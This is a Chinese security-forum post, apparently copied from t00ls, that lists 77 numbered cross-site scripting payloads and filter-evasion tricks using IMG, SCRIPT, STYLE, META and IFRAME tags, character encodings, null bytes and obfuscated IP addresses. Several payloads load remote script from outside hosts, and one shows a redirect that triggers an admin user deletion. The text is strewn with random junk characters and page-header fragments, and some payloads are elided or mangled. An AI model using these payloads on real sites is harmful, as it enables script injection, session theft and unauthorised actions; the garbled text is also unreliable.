貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。( y$ Y4 F2 \ z' |. M
(1)普通的XSS JavaScript注入
: m T% k$ M+ G# ?1 o<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>' T" q o0 {1 F
(2)IMG标签XSS使用JavaScript命令 j, a6 k$ S) R! ?! H% b/ E& b
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>, {+ t2 P. [: X7 S2 i& H
(3)IMG标签无分号无引号1 O; F# F {6 p7 \" w
<IMG SRC=javascript:alert(‘XSS’)>
. T) R8 f; ?( \" \' S(4)IMG标签大小写不敏感
# l3 x; k2 D# Y- b/ }* ^<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
$ _) q$ P+ R0 I( B. x) k7 p(5)HTML编码(必须有分号)
0 h; F. p% D6 Z# B# x<IMG SRC=javascript:alert(“XSS”)>
e5 J, m9 t8 G/ V7 O(6)修正缺陷IMG标签
8 u6 D, ^$ E" Q<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>: E: H% B/ ]- n O
. r+ C+ r. s" q0 G( e
( [6 S4 L" _$ ~5 k! F+ T+ m4 E(7)formCharCode标签(计算器)
9 V/ B' g7 ~8 B9 H8 i! ~6 W<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
) @- O4 ]$ H2 Q1 H( g; s/ w% p+ ~7 u(8)UTF-8的Unicode编码(计算器)& U, p1 s2 [* u
<IMG SRC=jav..省略..S')>
2 R- R q4 j& Z# n(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
( E9 O: \: _7 K4 L1 w. D3 s<IMG SRC=jav..省略..S')>
: b8 R2 T; Q' F" ]/ ^(10)十六进制编码也是没有分号(计算器)
* K* Q2 q8 T" w8 Q5 i<IMG SRC=java..省略..XSS')>
. R" ]( y8 {! I(11)嵌入式标签,将Javascript分开) a- S1 ~( V: P4 P4 ]* K
<IMG SRC=”jav ascript:alert(‘XSS’);”>0 Z8 a: p: U+ C2 ]1 P# h
(12)嵌入式编码标签,将Javascript分开
6 ^8 J" ^8 `7 u5 `0 L<IMG SRC=”jav ascript:alert(‘XSS’);”>
8 v* K$ g0 k/ @' X- `( Y- M3 Y) v(13)嵌入式换行符6 N& v2 ?, E% L
<IMG SRC=”jav ascript:alert(‘XSS’);”>( ~ Y, e+ s: w }7 N0 [5 d4 h
(14)嵌入式回车
$ P W: N) _" V( b C# l<IMG SRC=”jav ascript:alert(‘XSS’);”>" h3 Y0 Q& M( h0 B- ?. s/ u
(15)嵌入式多行注入JavaScript,这是XSS极端的例子4 e# j# q/ s( F8 k+ { u. f. B
<IMG SRC=”javascript:alert(‘XSS‘)”>
7 {( C6 G- o2 C5 `! M, Q6 V(16)解决限制字符(要求同页面)
8 O7 |' |7 ]) E* l8 \<script>z=’document.’</script>
$ u7 ^: K n l6 h<script>z=z+’write(“‘</script>
/ Q% K+ X8 ~0 S0 ^, h: L<script>z=z+’<script’</script>
$ A7 s8 A+ b% `, Z7 ?<script>z=z+’ src=ht’</script>& C, g- C# H; a, D5 d( S5 z$ z
<script>z=z+’tp://ww’</script>
$ U- Y( ~7 e- M% J: x T<script>z=z+’w.shell’</script>) J2 p+ }# h0 G( a$ m% h1 ]
<script>z=z+’.net/1.’</script>: m* q+ C2 ]+ A7 T0 p, D5 m9 M. j
<script>z=z+’js></sc’</script>% J8 X/ x9 ~; N, u; x
<script>z=z+’ript>”)’</script>
3 O3 q0 Y% ?& @0 z, ]7 X [9 a<script>eval_r(z)</script>7 R1 x" i0 D- O# d/ q
(17)空字符12-7-1 T00LS - Powered by Discuz! Board
9 t. l% t2 I y( L5 g. E# _2 l" M* D: b) shttps://www.t00ls.net/viewthread ... table&tid=15267 2/6" W8 _0 z5 C5 M+ f/ w" ?
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out' u. ? W* V2 e: f
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用3 \. j9 D; W- l/ R% e. C4 r* V
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out6 W. g( P- k! W* ^: n* h$ G( N
(19)Spaces和meta前的IMG标签
) [- i( J) g0 m0 |4 W<IMG SRC=” javascript:alert(‘XSS’);”>
, O# I2 a* q( Y) J(20)Non-alpha-non-digit XSS
6 b* B& [4 m o8 y7 R4 Y, B<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT># N @5 S- g* e( A3 r0 P' C
(21)Non-alpha-non-digit XSS to 22 j! V# J5 `3 q( @) b) q* W$ V
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>. ~& {5 X' b6 o/ \4 X+ A
(22)Non-alpha-non-digit XSS to 3
% Q9 t2 ?' v) x$ H9 X. U- o. E3 r<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
& |/ T# }+ _/ N9 |# Z/ T(23)双开括号
$ ^ A8 j" O3 m1 U9 Y<<SCRIPT>alert(“XSS”);//<</SCRIPT>( J0 ?; A& L$ E; d
(24)无结束脚本标记(仅火狐等浏览器)! ?: q$ f9 U" Q' F+ V
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
( G* ]8 t+ z9 ^(25)无结束脚本标记2: Y" a9 G8 @1 T- C& H% K' b$ f
<SCRIPT SRC=//3w.org/XSS/xss.js>( b( K/ | V, `# g6 U) }
(26)半开的HTML/JavaScript XSS
8 H! y- P, E# ]' u6 f<IMG SRC=”javascript:alert(‘XSS’)”3 a2 q& u! {. c8 w$ @
(27)双开角括号
- w; j3 s) |6 K7 P& J+ F9 f1 u<iframe src=http://3w.org/XSS.html <
% o2 n& e: j! J) o: W( ^(28)无单引号 双引号 分号 ?8 G* w' v3 c6 K3 K' |' ]
<SCRIPT>a=/XSS/2 w3 I4 F0 D q3 l+ w* ^
alert(a.source)</SCRIPT>
9 {! p1 O" R$ }; }# p( H(29)换码过滤的JavaScript
7 t% k# Q- B. W\”;alert(‘XSS’);//
/ q) C) p5 g4 B(30)结束Title标签' e! D' s4 X2 C. n+ {- C& P% |
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
( ^( x# T6 n% H) T: W5 ~(31)Input Image
% V) J4 P* Z# F2 D5 O# W0 w" X<INPUT SRC=”javascript:alert(‘XSS’);”>
8 r9 K& s% {7 i! j/ L5 d' o(32)BODY Image
, \0 i$ d5 d" n; H4 k<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
. R7 h$ I9 r5 O9 ?(33)BODY标签
X' j6 ^# F1 V g- l& o<BODY(‘XSS’)># n* \; A( l* y( M1 C$ I- h# l6 Q
(34)IMG Dynsrc
$ d" ]' `7 Z V4 L) t# i0 f<IMG DYNSRC=”javascript:alert(‘XSS’)”>
" Q# w: Y( G: d% R, h1 Q(35)IMG Lowsrc' R% k6 G& w1 \9 w4 `5 t
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
6 w9 z. P8 k' w2 ^(36)BGSOUND5 ]+ {3 @# h- F
<BGSOUND SRC=”javascript:alert(‘XSS’);”>: P2 v0 t% p+ F3 T9 P/ |, z
(37)STYLE sheet, ]" @/ B* r j
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>; V- M! y. Y8 d, u
(38)远程样式表
+ O1 W. [1 z6 d5 q4 D<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>* `" W: v4 [/ i1 A- {' X% o& D
(39)List-style-image(列表式)
5 v- f2 A! i$ b( T$ B% O& i0 Y* O0 }<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS9 U- i B1 [; i& K5 u" D1 \' X
(40)IMG VBscript+ B1 i# M8 i9 {/ ~% W+ F3 [
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
4 e5 I" @, u L. F/ p(41)META链接url
' l- Z1 T2 p$ k. }* e/ L1 r$ W) i+ ]4 b- Q u& Y
8 _/ Z1 i' _6 V3 I) I4 F2 n<META HTTP-EQUIV=”refresh” CONTENT=”0;
# K) B/ x# Z; e: W8 s7 {URL=http://;URL=javascript:alert(‘XSS’);”>
* F* P% J: p5 v, S; i: j" d+ L(42)Iframe
# V& K' _1 v0 p$ n<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
: |8 J( I5 a1 g* \(43)Frame: R3 Y" |: p9 G' p
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
8 U1 K9 z# p; V; A- phttps://www.t00ls.net/viewthread ... table&tid=15267 3/64 X' B' |: G; F6 a
(44)Table6 r. |( r+ w* o1 D) J. n) d
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
$ ^* e. _ \- @' ` |9 ?: z(45)TD
1 i; p+ a3 N$ V<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
9 R- F! h- L" g( I0 ^% I; `(46)DIV background-image
8 T" g4 w* B. { j. {2 p4 ]9 j<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>7 u- I; T4 K$ t# }7 s" d
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192- E, [/ u$ F4 u0 a: P% j* q7 o
8&13&12288&65279)
( m3 Z2 Y9 S. s& y& q. F<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
[; `4 ^; p: c' T. l$ v(48)DIV expression
0 M+ h/ h s5 V$ b& I<DIV STYLE=”width: expression_r(alert(‘XSS’));”>% A) G. |) R: g u u3 F
(49)STYLE属性分拆表达
/ \8 c: ^* M6 v5 ?& @' L<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>' t2 _ D3 E! ]/ B$ b) M% A9 h2 C
(50)匿名STYLE(组成:开角号和一个字母开头): U" _( [: Y v' A* H P( ^* e2 B
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
7 K4 f7 p! y& @(51)STYLE background-image# y% F! {% F1 Z& U
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A
& `7 h r4 S V9 ]( zCLASS=XSS></A>
* @5 g1 Z5 x2 R, w5 i(52)IMG STYLE方式" V8 t3 I$ r0 k7 s; J- g, R4 `
exppression(alert(“XSS”))’>
7 E+ u9 j$ a0 T$ l* A4 A( l# c(53)STYLE background
# ]3 R `1 U# A; A9 ^4 ?! k<STYLE><STYLE. V2 W* {8 \+ [% M3 G# Q L/ P
type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
- F6 s3 v2 t# I3 s(54)BASE
$ E* a" u: q$ k+ l6 i<BASE HREF=”javascript:alert(‘XSS’);//”>
) T: E. z9 A; b, L0 V' A% t(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS- D2 i% p) t8 J* `& w5 d) N1 C
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
5 L( H& w' y$ f, e4 ^(56)在flash中使用ActionScrpt可以混进你XSS的代码
1 Y8 k4 S7 Q- a6 ]4 G) s; u e3 Ha=”get”;
. J- d3 K" s0 r8 `" cb=”URL(\”";8 @3 V$ ~ K* E, J3 b* B
c=”javascript:”;( I3 f7 |- \2 p
d=”alert(‘XSS’);\”)”;( i' j# {& @' P1 w1 M
eval_r(a+b+c+d);
' T4 L- n/ S/ F2 P. n(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上& R) N/ W( C* D
<HTML xmlns:xss>
8 k) G9 e Q# j& r% Z2 v<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>5 s; Y# [# g+ o f; U+ l
<xss:xss>XSS</xss:xss>
% y. [# L/ F4 C# p</HTML>) O7 y/ b2 d. o% D
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
% i& |2 k% `, g- {<SCRIPT SRC=””></SCRIPT>
! D6 f( b: l B% f, Q(59)IMG嵌入式命令,可执行任意命令" N) a, D/ f: m A5 I7 Z X
<IMG SRC=”http://www.XXX.com/a.php?a=b”>1 i+ |' W9 e! _' F+ O- N
(60)IMG嵌入式命令(a.jpg在同服务器)$ R) q- H* J) }
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser8 J, D& D' P) r6 T, u3 r, _
(61)绕符号过滤) s8 l" \+ o3 X$ D$ r! K) W0 j
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>$ J- i. o% S y J1 x$ a# T4 u6 d I
(62)/ v* Q0 X$ r0 E& v$ K: X
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>! `7 |2 T V: t, o
(63)
* c% t4 x! `) T& s7 M" V9 h<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
: h( c* R. q' D9 D0 A- j8 a# x* h(64)
, {7 y* q+ W6 c, b<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>8 D T& ]) M3 {) `5 \6 |/ e9 f+ ]3 z
(65)
) a' k+ C% b' v! p4 v0 v" P! p<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>( F4 Y: t+ k- |- `& I* Z
(66)12-7-1 T00LS - Powered by Discuz! Board
3 G& v- b$ ^* h9 nhttps://www.t00ls.net/viewthread ... table&tid=15267 4/63 U/ s) r4 x" E. K& r7 t) k% S0 h
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>( L& |& d3 u1 ~8 c; G( u! v9 X
(67)4 _! E& m. Y( J
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>
6 B) g7 i( U, L `9 d</SCRIPT>/ D9 F ^& j1 n' Q
(68)URL绕行
9 o& ]& O, G" W0 {% i<A HREF=”http://127.0.0.1/”>XSS</A>
6 y* |! {. @* e! r( A3 k/ a(69)URL编码# m6 }) a1 r& x" V% _( {5 o8 g0 Y* E
<A HREF=”http://3w.org”>XSS</A>: u' O* b: m7 i( Z4 Q
(70)IP十进制6 C7 o1 d# D+ S' n0 G. N
<A HREF=”http://3232235521″>XSS</A> @" H9 v8 s! M, }
(71)IP十六进制
; R6 i; v, U+ O( a. _6 U6 [<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
* N% E! g3 o: Y1 P(72)IP八进制' D! k( R* y* r1 h8 f
<A HREF=”http://0300.0250.0000.0001″>XSS</A>9 V5 [1 X5 e* ~+ F8 X+ y7 R
(73)混合编码
% b: T; n8 ~3 e+ O; L5 b# o2 m; D<A HREF=”h: k$ _ v) ]/ v4 {; R! E( O
tt p://6 6.000146.0×7.147/”">XSS</A>
) b6 o" t! F M5 T" U7 u2 k(74)节省[http:]
& a$ ^/ H4 e9 b6 z v/ D* d, `% B<A HREF=”//www.google.com/”>XSS</A>9 @) ?: n+ j8 R4 ?# y. ^
(75)节省[www]& G, z$ M `: G; G' M
<A HREF=”http://google.com/”>XSS</A>
9 n# R/ I! G1 |9 ~- K(76)绝对点绝对DNS
5 T3 G1 B ^6 h4 }$ V<A HREF=”http://www.google.com./”>XSS</A>
) Q* E2 M" |6 J, [1 {" {7 f+ q! l(77)javascript链接
1 e, m* Z9 @$ `<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>' o& B y6 q7 C- X& h
L3 D7 j8 |# x3 p
原文地址:http://fuzzexp.org/u/0day/?p=14
+ @9 z3 i4 Q5 \) l9 O' `" l! j+ A
5 T2 i# f0 J- D8 j0 D# \! l4 p |
发表于 2013-4-19 19:22:37
收藏
支持
反对